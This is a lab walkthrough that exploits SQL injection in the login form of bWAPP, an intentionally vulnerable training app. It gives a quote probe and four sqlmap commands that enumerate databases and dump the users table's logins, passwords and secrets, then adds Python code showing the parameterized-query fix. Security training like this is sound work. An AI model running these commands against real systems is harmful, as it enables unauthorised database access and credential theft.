
SQL Injection Login Form User Low Security Level

3.0K views
Feb 6, 2022
5:13

SQL Injection (Login Form/User) - Low Security Level Solution:

*Note: I am using the BurpSuite preconfigured browser. If you are not using the preconfigured browser, configure your browser to use the proxy and then follow the steps below.

Step 1. Enter ' as the input in the Login text field, click the Login button and check the output.

Step 2. Turn on the intercept. Enter bee and bug in the Login and Password text fields, click the Login button and check the request in BurpSuite. Note the Cookie and PHPSESSID details:

    Cookie: security_level=0; PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2

Step 3. Let's create the payloads. Follow the steps as shown in the video.

Syntax:

    sqlmap -u "YOUR URL" --cookie="security_level=0; PHPSESSID=YOUR SESSION ID" --data "login=bee&password=bug&form=submit" --dbs

Payload 1:

    sqlmap -u "http://10.0.2.4/bWAPP/sqli_16.php" --cookie="security_level=0; PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2" --data "login=bee&password=bug&form=submit" --dbs

The payloads below are created with the same logic.

Payload 2:

    sqlmap -u "http://10.0.2.4/bWAPP/sqli_16.php" --cookie="security_level=0; PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2" --data "login=bee&password=bug&form=submit" -D bWAPP --tables

Payload 3:

    sqlmap -u "http://10.0.2.4/bWAPP/sqli_16.php" --cookie="security_level=0; PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2" --data "login=bee&password=bug&form=submit" -D bWAPP -T users --columns

Payload 4:

    sqlmap -u "http://10.0.2.4/bWAPP/sqli_16.php" --cookie="security_level=0; PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2" --data "login=bee&password=bug&form=submit" -D bWAPP -T users -C login,password,secret --dump

Step 4. Open a command prompt, paste the newly created payload into the command window and check the results.

PseudoTime
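The error that Step 1 looks for appears when the login value is concatenated into the SQL text, and it disappears once the value is bound as a parameter. The following is an added example, not code from the video or from bWAPP: it assumes Python's sqlite3 with a constructed in-memory users table as a stand-in for the application's database, and all function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the application's users table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT, secret TEXT)")
    conn.execute("INSERT INTO users VALUES ('bee', 'bug', 'constructed-secret')")
    return conn

def lookup_concatenated(conn, login):
    # Weak form: the input becomes part of the SQL text, so a quote
    # character changes how the statement is parsed.
    query = "SELECT login, secret FROM users WHERE login = '" + login + "'"
    try:
        return ("ok", conn.execute(query).fetchall())
    except sqlite3.Error as exc:
        return ("sql_error", str(exc))

def lookup_parameterized(conn, login):
    # Hardened form: the statement text is fixed and the input is bound
    # as data, so a quote is compared literally against the column.
    query = "SELECT login, secret FROM users WHERE login = ?"
    try:
        return ("ok", conn.execute(query, (login,)).fetchall())
    except sqlite3.Error as exc:
        return ("sql_error", str(exc))

def inputs_causing_sql_errors(handler, conn, inputs):
    # Regression check: list the inputs that make a handler surface a
    # database error instead of an ordinary "no such user" result.
    return [value for value in inputs if handler(conn, value)[0] == "sql_error"]

if __name__ == "__main__":
    db = make_db()
    # Constructed inputs: a valid login, the lone quote from Step 1, and a
    # legitimate name containing an apostrophe.
    samples = ["bee", "'", "O'Brien"]
    for name, handler in (("concatenated", lookup_concatenated),
                          ("parameterized", lookup_parameterized)):
        for value in samples:
            print(name, repr(value), handler(db, value))
        print(name, "breaks on:", inputs_causing_sql_errors(handler, db, samples))
```

The concatenated lookup also fails on the legitimate apostrophe in O'Brien, which is why a quote-handling test belongs in the login form's regression suite.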
